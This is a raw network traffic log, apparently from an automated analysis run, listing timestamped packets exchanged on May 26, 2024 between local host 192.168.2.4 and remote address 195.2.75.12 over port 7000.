May 26, 2024 01:21:25.673830986 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.673858881 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.673911095 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.674429893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.674515009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.674575090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.675086975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.675225019 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.675290108 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.675514936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.675658941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.675694942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.675723076 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.676431894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.676492929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.676625967 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.676757097 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.676841021 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.677099943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.677155018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.677237988 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.677289009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.677851915 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.677911043 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.678051949 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.678102970 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.678138018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.678198099 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.678621054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.678687096 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.678797007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.679279089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.679337978 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.679570913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.679703951 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.679779053 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.683804989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.683839083 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.683943987 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.714831114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.714917898 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.719398975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.719543934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.719659090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.719722986 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.719759941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.719825029 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.720191956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.720321894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.720383883 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.720544100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.720735073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.720817089 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.722359896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.722949028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.723040104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.723058939 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.723076105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.723129988 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.723323107 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.723398924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.723464966 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.724047899 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.724085093 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.724201918 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.724208117 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.724396944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.724467993 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.724860907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.724924088 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.724961042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.724982023 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.725687981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.725790977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.725816965 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.725954056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.726021051 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.734850883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.734925032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.735006094 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.735065937 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.735255957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.735322952 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.735464096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.735635042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.735671043 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.735704899 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.735734940 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.735775948 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.736218929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.736254930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.736288071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.736323118 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.736325979 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.736381054 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.736757994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.736793041 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.736829042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.736862898 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.737293005 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.737375021 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.737473965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.741811037 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.741936922 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.752863884 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.753000975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.753109932 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.753217936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.753252983 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.753312111 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.753693104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.753829956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.753895044 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.753990889 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.755801916 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.755836964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.755919933 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.756233931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.756309986 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.756349087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.756382942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.756433964 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.756711006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.756823063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.756876945 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.756987095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.757458925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.757517099 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.757560968 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.757740021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.757803917 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.758191109 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.758292913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.758349895 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.758945942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.758980036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.759013891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.759077072 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.759215117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.759270906 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.759617090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.759829044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.759896040 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.759947062 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.760423899 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.760535002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.760567904 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.760705948 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.760766983 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.761183023 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.761281013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.761342049 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.761454105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.761921883 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.761955976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.762016058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.762022972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.762123108 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.762659073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.762784958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.762837887 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.762952089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.763427973 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.763463020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.763488054 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.763700962 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.763756037 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.766257048 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.766633034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.766714096 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.766726971 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.766767025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.766875029 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.766904116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.767106056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.767139912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.767167091 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.767445087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.767564058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.767621994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.767853975 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.767888069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.767913103 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.768188000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.768222094 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.768307924 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.768354893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.768445969 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.768719912 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.769035101 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.769109964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.769124985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.769341946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.769376993 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.769418001 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.770132065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.770168066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.770203114 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.770236969 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.770237923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.770278931 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.772887945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.772959948 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.773401976 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.773691893 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.773727894 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.773762941 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.782691956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.782835007 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.810605049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.810659885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.810734034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.810874939 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.811317921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.811376095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.811405897 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.811410904 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.811506033 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.811532021 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.814064026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.814223051 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.815182924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.815217018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.815346956 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.818598032 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.818718910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.818785906 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.818941116 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.818977118 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.819011927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.819062948 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.819509029 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.819545031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.819572926 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.819578886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.819614887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.819653034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.819674015 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.819705009 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.820230007 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.820265055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.820300102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.820323944 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.820336103 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.820370913 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.820390940 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.821096897 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.821132898 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.821187973 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.821501017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.821537018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.821569920 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.821569920 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.821604967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.821639061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.821660042 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.821676016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.821702957 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.822396994 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.822432995 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.822463036 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.822467089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.822520018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.822531939 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.822555065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.822607994 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.823051929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.823129892 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.823344946 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.823441982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.827461004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.827495098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.827611923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.843894958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.844481945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.844609022 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.845777988 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.845846891 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.847058058 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.847093105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.848387003 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.848422050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.848458052 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.848498106 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.850938082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.852237940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.852272987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.852303028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.852312088 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.852379084 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.857007027 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.857043028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.857075930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.857156992 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.857377052 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.857619047 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.858438015 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.858474016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.858575106 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.860495090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.860531092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.860644102 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.862595081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.862629890 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.862713099 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.864633083 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.864669085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.864702940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.864784956 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.866710901 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.866746902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.866842985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.868781090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.868815899 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.868860960 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.870632887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.870646000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.870722055 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.872482061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.872518063 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.872545004 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.872550964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.872633934 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.874332905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.874370098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.874432087 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.876161098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.876197100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.876333952 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.877724886 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.877760887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.877831936 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.879205942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.879241943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.879384995 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.880713940 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.880748034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.880781889 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:25.880851030 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:25.882225990 CEST	7000	49730	195.2.75.12	192.168.2.4
